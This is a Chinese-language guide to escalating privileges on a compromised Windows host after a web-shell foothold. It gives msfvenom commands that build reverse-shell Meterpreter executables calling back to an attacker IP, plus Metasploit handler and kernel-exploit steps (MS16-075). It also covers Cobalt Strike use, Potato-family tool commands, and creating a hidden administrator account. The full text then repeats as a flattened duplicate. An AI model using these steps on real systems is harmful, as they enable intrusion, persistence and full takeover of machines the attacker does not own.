Windows系统提权全面指南

一、提权基础概念

1. 为什么要提权

前提条件：已获得普通用户权限（如通过Web后门连接）
目标：从普通用户权限提升至更高权限（如管理员或SYSTEM）

2. Windows用户权限等级

System：最高权限，拥有完全系统控制权
Administrators：管理员组，完全访问权限
Users：普通用户组，有限权限
Guests：访客组，最低权限
Backup Operators：备份操作员组
Power Users：高级用户组（介于普通用户和管理员之间）
Remote Desktop Users：远程桌面用户组
IIS_IUSRS：IIS服务专用用户组

二、Web环境差异与权限

1. Web搭建平台差异

集成软件（宝塔、Phpstudy等）：通常使用搭建者当前用户权限
自行搭建：可能分配较低权限
虚拟化环境（Docker、ESXi等）：权限取决于虚拟化配置

2. Web语言权限差异

权限从高到低：JSP > ASP.NET > ASP = PHP

JAVA/JSP：通常无需提权，直接获得较高权限
ASP.NET：中等权限
ASP/PHP：通常较低权限

三、Windows提权方法

1. 内核溢出漏洞提权

使用MSF框架提权步骤：

生成反弹后门

# 32位
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=4444 -f exe -o msf.exe

# 64位
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=4444 -f exe -o msf64.exe

配置监听会话

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 攻击者IP
set lport 4444
exploit/run

筛选EXP模块

use post/multi/recon/local_exploit_suggester
set showdescription true
set session 1
exploit/run

利用EXP溢出提权

use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit/run

常见内核漏洞：

MS16-075 (CVE-2016-3225)：Windows SMB服务器特权提升漏洞
CVE-2017-0213：Windows内核漏洞

2. 使用Cobalt Strike提权

设置Teamserver
创建监听器
生成有效载荷并上传执行
使用插件提权（如加载狐狸工具的cna文件）

3. 人工操作提权

步骤：

信息收集
- 使用whoami查看当前权限
- net user查看用户列表
- systeminfo查看系统信息

补丁筛选

使用WESNG工具分析补丁：

python wes.py systeminfo.txt -c -i "Elevation of Privilege" -o vlun.csv

搜索漏洞：
```
searchsploit windows
```

EXP获取与执行
- 从GitHub获取EXP：
  - SecWiki/windows-kernel-exploits
  - Ascotbe/Kernelhub

四、土豆(Potato)家族提权

1. 常用土豆提权工具

工具名称	适用系统	命令示例
RottenPotato	Windows Server 2016	-
SweetPotato	Windows Server 2022	`SweetPotato.exe`
BadPotato	多版本	`BadPotato.exe whoami`
EfsPotato	多版本	`EfsPotato.exe whoami`
GodPotato	多版本	`GodPotato.exe -cmd "cmd /c whoami"`
PetitPotato	多版本	`PetitPotato.exe 0 whoami`
PrintNotifyPotato	多版本	`PrintNotifyPotato.exe whoami`

2. 使用示例

# RasManPotato
RasMan.exe -i -c whoami -m 1

# MultiPotato
MultiPotato.exe -e "whoami" -t CreateProcessAsUserW

五、实用技巧

绕过限制：
- 无法执行命令时，可上传cmd.exe到可读写目录再调用

添加用户：

net user 用户名 密码 /add
net localgroup administrators 用户名 /add

权限检查：
- whoami /priv：查看当前用户特权
- whoami /groups：查看用户组信息

六、资源链接

漏洞利用数据库：
- nomi-sec/Poc-in-Github
- exploit-database/exploitdb
提权辅助工具：
- bitsadmin/wesng
内核漏洞集合：
- SecWiki/windows-kernel-exploits
- Ascotbe/Kernelhub

Windows系统提权全面指南一、提权基础概念 1. 为什么要提权前提条件：已获得普通用户权限（如通过Web后门连接）目标：从普通用户权限提升至更高权限（如管理员或SYSTEM） 2. Windows用户权限等级 System ：最高权限，拥有完全系统控制权 Administrators ：管理员组，完全访问权限 Users ：普通用户组，有限权限 Guests ：访客组，最低权限 Backup Operators ：备份操作员组 Power Users ：高级用户组（介于普通用户和管理员之间） Remote Desktop Users ：远程桌面用户组 IIS_ IUSRS ：IIS服务专用用户组二、Web环境差异与权限 1. Web搭建平台差异集成软件（宝塔、Phpstudy等）：通常使用搭建者当前用户权限自行搭建：可能分配较低权限虚拟化环境（Docker、ESXi等）：权限取决于虚拟化配置 2. Web语言权限差异权限从高到低：JSP > ASP.NET > ASP = PHP JAVA/JSP ：通常无需提权，直接获得较高权限 ASP.NET ：中等权限 ASP/PHP ：通常较低权限三、Windows提权方法 1. 内核溢出漏洞提权使用MSF框架提权步骤：生成反弹后门配置监听会话筛选EXP模块利用EXP溢出提权常见内核漏洞： MS16-075 (CVE-2016-3225)：Windows SMB服务器特权提升漏洞 CVE-2017-0213：Windows内核漏洞 2. 使用Cobalt Strike提权设置Teamserver 创建监听器生成有效载荷并上传执行使用插件提权（如加载狐狸工具的cna文件） 3. 人工操作提权步骤：信息收集使用 whoami 查看当前权限 net user 查看用户列表 systeminfo 查看系统信息补丁筛选使用WESNG工具分析补丁：搜索漏洞： EXP获取与执行从GitHub获取EXP： SecWiki/windows-kernel-exploits Ascotbe/Kernelhub 四、土豆(Potato)家族提权 1. 常用土豆提权工具 | 工具名称 | 适用系统 | 命令示例 | |---------|---------|---------| | RottenPotato | Windows Server 2016 | - | | SweetPotato | Windows Server 2022 | SweetPotato.exe | | BadPotato | 多版本 | BadPotato.exe whoami | | EfsPotato | 多版本 | EfsPotato.exe whoami | | GodPotato | 多版本 | GodPotato.exe -cmd "cmd /c whoami" | | PetitPotato | 多版本 | PetitPotato.exe 0 whoami | | PrintNotifyPotato | 多版本 | PrintNotifyPotato.exe whoami | 2. 使用示例五、实用技巧绕过限制：无法执行命令时，可上传cmd.exe到可读写目录再调用添加用户：权限检查： whoami /priv ：查看当前用户特权 whoami /groups ：查看用户组信息六、资源链接漏洞利用数据库： nomi-sec/Poc-in-Github exploit-database/exploitdb 提权辅助工具： bitsadmin/wesng 内核漏洞集合： SecWiki/windows-kernel-exploits Ascotbe/Kernelhub